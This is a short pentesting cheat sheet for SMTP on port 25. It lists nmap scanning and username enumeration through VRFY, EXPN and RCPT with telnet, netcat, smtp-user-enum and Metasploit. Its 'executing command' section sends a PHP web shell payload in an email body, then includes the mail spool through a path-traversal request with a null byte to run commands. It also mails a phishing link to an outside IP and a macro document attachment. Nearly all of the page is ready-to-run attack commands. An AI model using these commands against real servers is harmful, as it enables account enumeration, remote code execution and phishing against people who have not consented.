Skip to content

25 - Pentesting smtp

SMTP stands for "Simple Mail Transfer Protocol". It is a protocol used for sending email messages between servers. Most email systems that send mail over the Internet use SMTP to send messages from one server to another, and to deliver messages to local mail clients like Microsoft Outlook or Apple Mail. SMTP servers listen for incoming mail, and then use other protocols to deliver the message to the recipient's mailbox.

nmap


nmap -p 25 -sV -sC -Pn -vv $IP

telnet


telnet $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

netcat


netcat $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

smtp-user-enum


sudo apt install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP

metasploit


use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run

executing command


send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $IP

send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <a href="http://192.168.45.206">click me</a> BodyEnd' --server $IP

send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart File for you BodyEnd' --attach mymacro.doc --server $IP

execute

curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'